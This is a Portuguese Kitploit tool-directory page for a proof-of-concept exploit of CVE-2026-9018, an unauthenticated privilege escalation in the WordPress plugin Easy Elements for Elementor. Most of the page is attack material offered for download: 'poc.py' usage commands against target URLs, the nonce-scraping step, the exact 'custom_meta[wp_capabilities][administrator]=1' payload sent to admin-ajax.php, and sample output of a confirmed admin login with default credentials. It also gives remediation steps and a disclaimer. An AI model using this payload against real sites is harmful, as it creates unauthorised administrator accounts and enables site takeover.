Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-9018 — Escalação de Privilégios Não Autenticada CVE-2026-9018: Easy Elements for Elementor | Kitploit
Ferramentas/GitHubGitHub/xxconi/cve-2026-9018
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubxxconi/cve-2026-9018

CVE-2026-9018

Escalação de Privilégios Não Autenticada CVE-2026-9018: Easy Elements for Elementor

Ver Repositório
1há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-9018

CVE-2026-9018 — Easy Elements for Elementor ≤ 1.4.5 | Escalação de Privilégios sem Autenticação

CVE CVSS CWE Auth Python

Pesquisa por: Atomic Edge Severidade: Alta | CVSS: 8.8 | Autenticação necessária: Nenhuma


Visão Geral

Existe uma vulnerabilidade de escalação de privilégios sem autenticação no plugin WordPress Easy Elements for Elementor – Addons & Website Templates (versões ≤ 1.4.5). A função easyel_handle_register(), exposta pelo handler AJAX wp_ajax_nopriv_eel_register, repassa os valores POST custom_meta controlados pelo atacante diretamente para update_user_meta() sem nenhuma lista de permissões de chaves. Isso permite que um atacante não autenticado sobrescreva a chave de meta wp_capabilities e crie uma conta de nível administrador.


Pré-requisitos

Antes da exploração, as seguintes condições precisam ser atendidas no site alvo:

  • ✅ O registro de usuários do WordPress está habilitado (Settings → General → Anyone can register)
  • ✅ Uma página com o widget Login/Register do plugin está publicamente acessível
  • ✅ O widget expõe o valor easy_elements_nonce no DOM da página.

Requisitos

root@kitploit:~
pip install requests

Uso

root@kitploit:~
# Basic — nonce fetched from homepage
python3 poc.py -u https://target.com

# Custom credentials
python3 poc.py -u https://target.com -U hacker -e [email protected] -p P@ssw0rd!

# Widget is on /login/ page
python3 poc.py -u https://target.com --nonce-page /login/

# Skip SSL verification
python3 poc.py -u https://target.com --no-verify

# Skip post-exploit login check
python3 poc.py -u https://target.com --skip-verify-login

Argumentos

Exemplo de Saída

root@kitploit:~
[*] Fetching nonce from: https://target.com/login/
[+] Nonce found: a1b2c3d4e5

[*] Sending privilege escalation payload to: https://target.com/wp-admin/admin-ajax.php
[*] Username : atomic_admin
[*] Email    : [email protected]
[*] Role     : administrator (via wp_capabilities override)

[+] HTTP Status : 200
[✓] Privilege escalation payload accepted!
[✓] Admin login CONFIRMED!

    ┌─────────────────────────────────────────┐
    │  WP Admin  : https://target.com/wp-admin/
    │  Username  : atomic_admin
    │  Password  : Atomic@Edge2026!
    └─────────────────────────────────────────┘

Detalhes Técnicos

O exploit segue um processo de duas etapas:

Etapa 1 — Coleta de nonce

O widget Login/Register do Elementor do plugin renderiza um campo oculto easy_elements_nonce no HTML da página. Esse nonce é publicamente acessível a qualquer visitante não autenticado e é extraído por meio de regex do código-fonte da página.

Etapa 2 — Registro Malicioso

Uma requisição POST é enviada para /wp-admin/admin-ajax.php com action=eel_register. O array custom_meta é criado para incluir:

root@kitploit:~
custom_meta[wp_capabilities][administrator] = 1

Como easyel_handle_register() repassa todas as chaves custom_meta diretamente para update_user_meta() sem uma lista de permissões, a meta de usuário wp_capabilities é sobrescrita após o registro, concedendo ao novo usuário privilégios totais de administrador.


Remediação

Os desenvolvedores devem aplicar as seguintes correções em easyel_handle_register():

  1. Implementar uma lista de permissões estrita das chaves custom_meta permitidas (ex.: first_name, last_name, phone)
  2. Bloquear explicitamente chaves sensíveis: wp_capabilities, wp_user_level, session_tokens
  3. Evitar processar qualquer meta fornecida pelo usuário após wp_insert_user() se não for necessário
  4. A sanitização de entrada por si só é insuficiente — uma lista de permissões é obrigatória

→ Atualize para Easy Elements for Elementor 1.4.6 ou superior imediatamente.


Isenção de Responsabilidade

Este repositório destina-se somente a pesquisas de segurança autorizadas e fins educacionais. Não use esta ferramenta contra qualquer sistema sem permissão explícita por escrito do proprietário do sistema. O uso não autorizado pode violar a CFAA (EUA), o Criminal Code s.342.1 (Canadá), a Diretiva NIS2 da UE e outras leis aplicáveis. Os autores não aceitam nenhuma responsabilidade por uso indevido ou danos decorrentes deste código.

Baixar ferramenta
PropriedadeDetalhe
PluginEasy Elements for Elementor – Addons & Website Templates (easy-elements)
Afetado≤ 1.4.5
Corrigido em1.4.6+
VetorRede / Sem autenticação
CWECWE-269: Gerenciamento inadequado de privilégios
Ação AJAXeel_register (nopriv)
FlagDescriçãoPadrão
-u, --urlURL do WordPress alvo(obrigatório)
-U, --usernameNome de usuário para a nova conta de administradoratomic_admin
-e, --emailE-mail para a nova conta de administrador[email protected]
-p, --passwordSenha para a nova conta de administradorAtomic@Edge2026!
-np, --nonce-pageCaminho da página que contém o widget Login/Register/
--no-verifyDesativar verificação de certificado SSLfalse
--skip-verify-loginPular verificação de login de administrador do WP pós-exploraçãofalse